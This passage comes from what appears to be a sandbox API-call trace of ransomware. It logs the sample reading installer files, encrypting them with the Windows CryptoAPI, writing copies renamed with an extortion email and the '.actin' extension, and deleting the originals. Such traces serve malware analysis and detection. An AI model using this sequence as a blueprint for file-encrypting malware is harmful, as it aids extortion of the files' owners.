"c:\\588bce7c90097ed212\\1032\\eula.rtf")) returned 0x80 [0046.249] GetFileAttributesW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1032\\eula.rtf.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\588bce7c90097ed212\\1032\\eula.rtf.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0046.249] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1032\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1032\\eula.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2e4 [0046.249] SetFilePointerEx (in: hFile=0x2e4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x37afe50 | out: lpNewFilePointer=0x0) returned 1 [0046.249] SetFilePointerEx (in: hFile=0x2e4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x37afe50 | out: lpNewFilePointer=0x0) returned 1 [0046.249] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1032\\eula.rtf.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\588bce7c90097ed212\\1032\\eula.rtf.id[b4197730-0115].[fileisafe@tuta.io].actin"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x320 [0046.251] CryptImportKey (in: hProv=0xf466e8, pbData=0x37afe08, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x37afe64 | out: phKey=0x37afe64*=0xf71d80) returned 1 [0046.251] CryptSetKeyParam (hKey=0xf71d80, dwParam=0x1, pbData=0x37aff18, dwFlags=0x0) returned 1 [0046.251] ReadFile (in: hFile=0x2e4, lpBuffer=0x3b30020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x37afe8c, lpOverlapped=0x0 | out: lpBuffer=0x3b30020*, lpNumberOfBytesRead=0x37afe8c*=0x22ac, lpOverlapped=0x0) returned 1 [0046.254] CryptEncrypt (in: hKey=0xf71d80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3b30020*, pdwDataLen=0x37afe28*=0x22b0, dwBufLen=0x22b0 | out: pbData=0x3b30020*, pdwDataLen=0x37afe28*=0x22b0) returned 1 [0046.254] WriteFile (in: hFile=0x320, lpBuffer=0x3b30020*, nNumberOfBytesToWrite=0x22b0, lpNumberOfBytesWritten=0x37afe70, lpOverlapped=0x0 | out: lpBuffer=0x3b30020*, lpNumberOfBytesWritten=0x37afe70*=0x22b0, lpOverlapped=0x0) returned 1 [0046.255] CryptImportKey (in: hProv=0xf466e8, pbData=0x37afdfc, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x37afe68 | out: phKey=0x37afe68*=0xf71a40) returned 1 [0046.255] CryptSetKeyParam (hKey=0xf71a40, dwParam=0x1, pbData=0x37aff18, dwFlags=0x0) returned 1 [0046.255] CryptEncrypt (in: hKey=0xf71a40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3b30020*, pdwDataLen=0x37afe28*=0x40, dwBufLen=0x40 | out: pbData=0x3b30020*, pdwDataLen=0x37afe28*=0x40) returned 1 [0046.255] CryptDestroyKey (hKey=0xf71a40) returned 1 [0046.255] WriteFile (in: hFile=0x320, lpBuffer=0x3b30020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x37afe70, lpOverlapped=0x0 | out: lpBuffer=0x3b30020*, lpNumberOfBytesWritten=0x37afe70*=0xf2, lpOverlapped=0x0) returned 1 [0046.255] CryptDestroyKey (hKey=0xf71d80) returned 1 [0046.255] CloseHandle (hObject=0x2e4) returned 1 [0046.255] CloseHandle (hObject=0x320) returned 1 [0046.256] DeleteFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1032\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1032\\eula.rtf")) returned 1 [0046.270] SetEvent (hEvent=0x2e8) returned 1 [0046.270] CryptGenRandom (in: hProv=0xf466e8, dwLen=0x10, pbBuffer=0x37aff18 | out: pbBuffer=0x37aff18) returned 1 [0046.270] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1032\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\1032\\setupresources.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x320 [0046.270] GetFileSizeEx (in: hFile=0x320, lpFileSize=0x37afeb0 | out: lpFileSize=0x37afeb0*=19288) returned 1 [0046.270] CloseHandle (hObject=0x320) returned 1 [0046.270] GetFileAttributesW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1032\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\1032\\setupresources.dll")) returned 0x80 [0046.270] GetFileAttributesW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1032\\SetupResources.dll.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\588bce7c90097ed212\\1032\\setupresources.dll.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0046.270] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1032\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\1032\\setupresources.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x320 [0046.270] SetFilePointerEx (in: hFile=0x320, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x37afe50 | out: lpNewFilePointer=0x0) returned 1 [0046.271] SetFilePointerEx (in: hFile=0x320, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x37afe50 | out: lpNewFilePointer=0x0) returned 1 [0046.271] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1032\\SetupResources.dll.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\588bce7c90097ed212\\1032\\setupresources.dll.id[b4197730-0115].[fileisafe@tuta.io].actin"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2e4 [0046.271] CryptImportKey (in: hProv=0xf466e8, pbData=0x37afe08, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x37afe64 | out: phKey=0x37afe64*=0xf71e40) returned 1 [0046.271] CryptSetKeyParam (hKey=0xf71e40, dwParam=0x1, pbData=0x37aff18, dwFlags=0x0) returned 1 [0046.271] ReadFile (in: hFile=0x320, lpBuffer=0x3b30020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x37afe8c, lpOverlapped=0x0 | out: lpBuffer=0x3b30020*, lpNumberOfBytesRead=0x37afe8c*=0x4b58, lpOverlapped=0x0) returned 1 [0046.485] CryptEncrypt (in: hKey=0xf71e40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3b30020*, pdwDataLen=0x37afe28*=0x4b60, dwBufLen=0x4b60 | out: pbData=0x3b30020*, pdwDataLen=0x37afe28*=0x4b60) returned 1 [0046.485] WriteFile (in: hFile=0x2e4, lpBuffer=0x3b30020*, nNumberOfBytesToWrite=0x4b60, lpNumberOfBytesWritten=0x37afe70, lpOverlapped=0x0 | out: lpBuffer=0x3b30020*, lpNumberOfBytesWritten=0x37afe70*=0x4b60, lpOverlapped=0x0) returned 1 [0046.486] CryptImportKey (in: hProv=0xf466e8, pbData=0x37afdfc, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x37afe68 | out: phKey=0x37afe68*=0xf71a40) returned 1 [0046.486] CryptSetKeyParam (hKey=0xf71a40, dwParam=0x1, pbData=0x37aff18, dwFlags=0x0) returned 1 [0046.486] CryptEncrypt (in: hKey=0xf71a40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3b30020*, pdwDataLen=0x37afe28*=0x50, dwBufLen=0x50 | out: pbData=0x3b30020*, pdwDataLen=0x37afe28*=0x50) returned 1 [0046.486] CryptDestroyKey (hKey=0xf71a40) returned 1 [0046.486] WriteFile (in: hFile=0x2e4, lpBuffer=0x3b30020*, nNumberOfBytesToWrite=0x102, lpNumberOfBytesWritten=0x37afe70, lpOverlapped=0x0 | out: lpBuffer=0x3b30020*, lpNumberOfBytesWritten=0x37afe70*=0x102, lpOverlapped=0x0) returned 1 [0046.486] CryptDestroyKey (hKey=0xf71e40) returned 1 [0046.486] CloseHandle (hObject=0x320) returned 1 [0046.486] CloseHandle (hObject=0x2e4) returned 1 [0046.487] DeleteFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1032\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\1032\\setupresources.dll")) returned 1 [0046.488] SetEvent (hEvent=0x2e8) returned 1 [0046.488] CryptGenRandom (in: hProv=0xf466e8, dwLen=0x10, pbBuffer=0x37aff18 | out: pbBuffer=0x37aff18) returned 1 [0046.488] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1033\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\1033\\setupresources.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2e4 [0046.488] GetFileSizeEx (in: hFile=0x2e4, lpFileSize=0x37afeb0 | out: lpFileSize=0x37afeb0*=17240) returned 1 [0046.488] CloseHandle (hObject=0x2e4) returned 1 [0046.488] GetFileAttributesW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1033\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\1033\\setupresources.dll")) returned 0x80 [0046.488] GetFileAttributesW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1033\\SetupResources.dll.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\588bce7c90097ed212\\1033\\setupresources.dll.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0046.488] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1033\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\1033\\setupresources.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2e4 [0046.489] SetFilePointerEx (in: hFile=0x2e4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x37afe50 | out: lpNewFilePointer=0x0) returned 1 [0046.489] SetFilePointerEx (in: hFile=0x2e4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x37afe50 | out: lpNewFilePointer=0x0) returned 1 [0046.489] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1033\\SetupResources.dll.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\588bce7c90097ed212\\1033\\setupresources.dll.id[b4197730-0115].[fileisafe@tuta.io].actin"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x320 [0046.489] CryptImportKey (in: hProv=0xf466e8, pbData=0x37afe08, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x37afe64 | out: phKey=0x37afe64*=0xf72000) returned 1 [0046.489] CryptSetKeyParam (hKey=0xf72000, dwParam=0x1, pbData=0x37aff18, dwFlags=0x0) returned 1 [0046.489] ReadFile (in: hFile=0x2e4, lpBuffer=0x3b30020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x37afe8c, lpOverlapped=0x0 | out: lpBuffer=0x3b30020*, lpNumberOfBytesRead=0x37afe8c*=0x4358, lpOverlapped=0x0) returned 1 [0046.490] CryptEncrypt (in: hKey=0xf72000, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3b30020*, pdwDataLen=0x37afe28*=0x4360, dwBufLen=0x4360 | out: pbData=0x3b30020*, pdwDataLen=0x37afe28*=0x4360) returned 1 [0046.490] WriteFile (in: hFile=0x320, lpBuffer=0x3b30020*, nNumberOfBytesToWrite=0x4360, lpNumberOfBytesWritten=0x37afe70, lpOverlapped=0x0 | out: lpBuffer=0x3b30020*, lpNumberOfBytesWritten=0x37afe70*=0x4360, lpOverlapped=0x0) returned 1 [0046.491] CryptImportKey (in: hProv=0xf466e8, pbData=0x37afdfc, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x37afe68 | out: phKey=0x37afe68*=0xf72140) returned 1 [0046.491] CryptSetKeyParam (hKey=0xf72140, dwParam=0x1, pbData=0x37aff18, dwFlags=0x0) returned 1 [0046.491] CryptEncrypt (in: hKey=0xf72140, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3b30020*, pdwDataLen=0x37afe28*=0x50, dwBufLen=0x50 | out: pbData=0x3b30020*, pdwDataLen=0x37afe28*=0x50) returned 1 [0046.491] CryptDestroyKey (hKey=0xf72140) returned 1 [0046.491] WriteFile (in: hFile=0x320, lpBuffer=0x3b30020*, nNumberOfBytesToWrite=0x102, lpNumberOfBytesWritten=0x37afe70, lpOverlapped=0x0 | out: lpBuffer=0x3b30020*, lpNumberOfBytesWritten=0x37afe70*=0x102, lpOverlapped=0x0) returned 1 [0046.492] CryptDestroyKey (hKey=0xf72000) returned 1 [0046.492] CloseHandle (hObject=0x2e4) returned 1 [0046.492] CloseHandle (hObject=0x320) returned 1 [0046.492] DeleteFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1033\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\1033\\setupresources.dll")) returned 1 [0046.493] SetEvent (hEvent=0x2e8) returned 1 [0046.493] CryptGenRandom (in: hProv=0xf466e8, dwLen=0x10, pbBuffer=0x37aff18 | out: pbBuffer=0x37aff18) returned 1 [0046.494] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1035\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1035\\eula.rtf"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x320 [0046.494] GetFileSizeEx (in: hFile=0x320, lpFileSize=0x37afeb0 | out: lpFileSize=0x37afeb0*=3702) returned 1 [0046.494] CloseHandle (hObject=0x320) returned 1 [0046.494] GetFileAttributesW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1035\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1035\\eula.rtf")) returned 0x80 [0046.494] GetFileAttributesW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1035\\eula.rtf.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\588bce7c90097ed212\\1035\\eula.rtf.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0046.494] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1035\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1035\\eula.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x320 [0046.494] SetFilePointerEx (in: hFile=0x320, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x37afe50 | out: lpNewFilePointer=0x0) returned 1 [0046.494] SetFilePointerEx (in: hFile=0x320, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x37afe50 | out: lpNewFilePointer=0x0) returned 1 [0046.494] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1035\\eula.rtf.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\588bce7c90097ed212\\1035\\eula.rtf.id[b4197730-0115].[fileisafe@tuta.io].actin"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2e4 [0046.496] CryptImportKey (in: hProv=0xf466e8, pbData=0x37afe08, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x37afe64 | out: phKey=0x37afe64*=0xf71cc0) returned 1 [0046.496] CryptSetKeyParam (hKey=0xf71cc0, dwParam=0x1, pbData=0x37aff18, dwFlags=0x0) returned 1 [0046.496] ReadFile (in: hFile=0x320, lpBuffer=0x3b30020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x37afe8c, lpOverlapped=0x0 | out: lpBuffer=0x3b30020*, lpNumberOfBytesRead=0x37afe8c*=0xe76, lpOverlapped=0x0) returned 1 [0046.497] CryptEncrypt (in: hKey=0xf71cc0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3b30020*, pdwDataLen=0x37afe28*=0xe80, dwBufLen=0xe80 | out: pbData=0x3b30020*, pdwDataLen=0x37afe28*=0xe80) returned 1 [0046.497] WriteFile (in: hFile=0x2e4, lpBuffer=0x3b30020*, nNumberOfBytesToWrite=0xe80, lpNumberOfBytesWritten=0x37afe70, lpOverlapped=0x0 | out: lpBuffer=0x3b30020*, lpNumberOfBytesWritten=0x37afe70*=0xe80, lpOverlapped=0x0) returned 1 [0046.498] CryptImportKey (in: hProv=0xf466e8, pbData=0x37afdfc, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x37afe68 | out: phKey=0x37afe68*=0xf71b80) returned 1 [0046.498] CryptSetKeyParam (hKey=0xf71b80, dwParam=0x1, pbData=0x37aff18, dwFlags=0x0) returned 1 [0046.498] CryptEncrypt (in: hKey=0xf71b80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3b30020*, pdwDataLen=0x37afe28*=0x40, dwBufLen=0x40 | out: pbData=0x3b30020*, pdwDataLen=0x37afe28*=0x40) returned 1 [0046.498] CryptDestroyKey (hKey=0xf71b80) returned 1 [0046.498] WriteFile (in: hFile=0x2e4, lpBuffer=0x3b30020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x37afe70, lpOverlapped=0x0 | out: lpBuffer=0x3b30020*, lpNumberOfBytesWritten=0x37afe70*=0xf2, lpOverlapped=0x0) returned 1 [0046.498] CryptDestroyKey (hKey=0xf71cc0) returned 1 [0046.498] CloseHandle (hObject=0x320) returned 1 [0046.498] CloseHandle (hObject=0x2e4) returned 1 [0046.499] DeleteFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1035\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1035\\eula.rtf")) returned 1 [0046.500] SetEvent (hEvent=0x2e8) returned 1 [0046.500] CryptGenRandom (in: hProv=0xf466e8, dwLen=0x10, pbBuffer=0x37aff18 | out: pbBuffer=0x37aff18) returned 1 [0046.500] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1035\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1035\\localizeddata.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2e4 [0046.500] GetFileSizeEx (in: hFile=0x2e4, lpFileSize=0x37afeb0 | out: lpFileSize=0x37afeb0*=77022) returned 1 [0046.500] CloseHandle (hObject=0x2e4) returned 1 [0046.500] GetFileAttributesW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1035\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1035\\localizeddata.xml")) returned 0x80 [0046.500] GetFileAttributesW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1035\\LocalizedData.xml.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\588bce7c90097ed212\\1035\\localizeddata.xml.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0046.500] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1035\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1035\\localizeddata.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2e4 [0046.500] SetFilePointerEx (in: hFile=0x2e4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x37afe50 | out: lpNewFilePointer=0x0) returned 1 [0046.500] SetFilePointerEx (in: hFile=0x2e4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x37afe50 | out: lpNewFilePointer=0x0) returned 1 [0046.500] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1035\\LocalizedData.xml.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\588bce7c90097ed212\\1035\\localizeddata.xml.id[b4197730-0115].[fileisafe@tuta.io].actin"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x320 [0046.500] CryptImportKey (in: hProv=0xf466e8, pbData=0x37afe08, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x37afe64 | out: phKey=0x37afe64*=0xf71d40) returned 1 [0046.500] CryptSetKeyParam (hKey=0xf71d40, dwParam=0x1, pbData=0x37aff18, dwFlags=0x0) returned 1 [0046.500] ReadFile (in: hFile=0x2e4, lpBuffer=0x3b30020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x37afe8c, lpOverlapped=0x0 | out: lpBuffer=0x3b30020*, lpNumberOfBytesRead=0x37afe8c*=0x12cde, lpOverlapped=0x0) returned 1 [0046.502] CryptEncrypt (in: hKey=0xf71d40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3b30020*, pdwDataLen=0x37afe28*=0x12ce0, dwBufLen=0x12ce0 | out: pbData=0x3b30020*, pdwDataLen=0x37afe28*=0x12ce0) returned 1 [0046.502] WriteFile (in: hFile=0x320, lpBuffer=0x3b30020*, nNumberOfBytesToWrite=0x12ce0, lpNumberOfBytesWritten=0x37afe70, lpOverlapped=0x0 | out: lpBuffer=0x3b30020*, lpNumberOfBytesWritten=0x37afe70*=0x12ce0, lpOverlapped=0x0) returned 1 [0046.504] CryptImportKey (in: hProv=0xf466e8, pbData=0x37afdfc, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x37afe68 | out: phKey=0x37afe68*=0xf71e00) returned 1 [0046.504] CryptSetKeyParam (hKey=0xf71e00, dwParam=0x1, pbData=0x37aff18, dwFlags=0x0) returned 1 [0046.504] CryptEncrypt (in: hKey=0xf71e00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3b30020*, pdwDataLen=0x37afe28*=0x50, dwBufLen=0x50 | out: pbData=0x3b30020*, pdwDataLen=0x37afe28*=0x50) returned 1 [0046.504] CryptDestroyKey (hKey=0xf71e00) returned 1 [0046.504] WriteFile (in: hFile=0x320, lpBuffer=0x3b30020*, nNumberOfBytesToWrite=0x102, lpNumberOfBytesWritten=0x37afe70, lpOverlapped=0x0 | out: lpBuffer=0x3b30020*, lpNumberOfBytesWritten=0x37afe70*=0x102, lpOverlapped=0x0) returned 1 [0046.504] CryptDestroyKey (hKey=0xf71d40) returned 1 [0046.504] CloseHandle (hObject=0x2e4) returned 1 [0046.504] CloseHandle (hObject=0x320) returned 1 [0046.506] DeleteFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1035\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1035\\localizeddata.xml")) returned 1 [0046.507] SetEvent (hEvent=0x2e8) returned 1 [0046.507] CryptGenRandom (in: hProv=0xf466e8, dwLen=0x10, pbBuffer=0x37aff18 | out: pbBuffer=0x37aff18) returned 1 [0046.508] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1035\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\1035\\setupresources.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x320 [0046.508] GetFileSizeEx (in: hFile=0x320, lpFileSize=0x37afeb0 | out: lpFileSize=0x37afeb0*=18264) returned 1 [0046.508] CloseHandle (hObject=0x320) returned 1 [0046.508] GetFileAttributesW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1035\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\1035\\setupresources.dll")) returned 0x80 [0046.508] GetFileAttributesW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1035\\SetupResources.dll.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\588bce7c90097ed212\\1035\\setupresources.dll.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0046.508] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1035\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\1035\\setupresources.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x320 [0046.508] SetFilePointerEx (in: hFile=0x320, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x37afe50 | out: lpNewFilePointer=0x0) returned 1 [0046.508] SetFilePointerEx (in: hFile=0x320, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x37afe50 | out: lpNewFilePointer=0x0) returned 1 [0046.508] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1035\\SetupResources.dll.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\588bce7c90097ed212\\1035\\setupresources.dll.id[b4197730-0115].[fileisafe@tuta.io].actin"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2e4 [0046.508] CryptImportKey (in: hProv=0xf466e8, pbData=0x37afe08, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x37afe64 | out: phKey=0x37afe64*=0xf72140) returned 1 [0046.508] CryptSetKeyParam (hKey=0xf72140, dwParam=0x1, pbData=0x37aff18, dwFlags=0x0) returned 1 [0046.508] ReadFile (in: hFile=0x320, lpBuffer=0x3b30020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x37afe8c, lpOverlapped=0x0 | out: lpBuffer=0x3b30020*, lpNumberOfBytesRead=0x37afe8c*=0x4758, lpOverlapped=0x0) returned 1 [0046.510] CryptEncrypt (in: hKey=0xf72140, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3b30020*, pdwDataLen=0x37afe28*=0x4760, dwBufLen=0x4760 | out: pbData=0x3b30020*, pdwDataLen=0x37afe28*=0x4760) returned 1 [0046.510] WriteFile (in: hFile=0x2e4, lpBuffer=0x3b30020*, nNumberOfBytesToWrite=0x4760, lpNumberOfBytesWritten=0x37afe70, lpOverlapped=0x0 | out: lpBuffer=0x3b30020*, lpNumberOfBytesWritten=0x37afe70*=0x4760, lpOverlapped=0x0) returned 1 [0046.511] CryptImportKey (in: hProv=0xf466e8, pbData=0x37afdfc, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x37afe68 | out: phKey=0x37afe68*=0xf71f40) returned 1 [0046.511] CryptSetKeyParam (hKey=0xf71f40, dwParam=0x1, pbData=0x37aff18, dwFlags=0x0) returned 1 [0046.511] CryptEncrypt (in: hKey=0xf71f40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3b30020*, pdwDataLen=0x37afe28*=0x50, dwBufLen=0x50 | out: pbData=0x3b30020*, pdwDataLen=0x37afe28*=0x50) returned 1 [0046.511] CryptDestroyKey (hKey=0xf71f40) returned 1 [0046.511] WriteFile (in: hFile=0x2e4, lpBuffer=0x3b30020*, nNumberOfBytesToWrite=0x102, lpNumberOfBytesWritten=0x37afe70, lpOverlapped=0x0 | out: lpBuffer=0x3b30020*, lpNumberOfBytesWritten=0x37afe70*=0x102, lpOverlapped=0x0) returned 1 [0046.511] CryptDestroyKey (hKey=0xf72140) returned 1 [0046.511] CloseHandle (hObject=0x320) returned 1 [0046.511] CloseHandle (hObject=0x2e4) returned 1 [0046.512] DeleteFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1035\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\1035\\setupresources.dll")) returned 1 [0046.514] SetEvent (hEvent=0x2e8) returned 1 [0046.514] CryptGenRandom (in: hProv=0xf466e8, dwLen=0x10, pbBuffer=0x37aff18 | out: pbBuffer=0x37aff18) returned 1 [0046.514] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1036\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1036\\eula.rtf"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2e4 [0046.514] GetFileSizeEx (in: hFile=0x2e4, lpFileSize=0x37afeb0 | out: 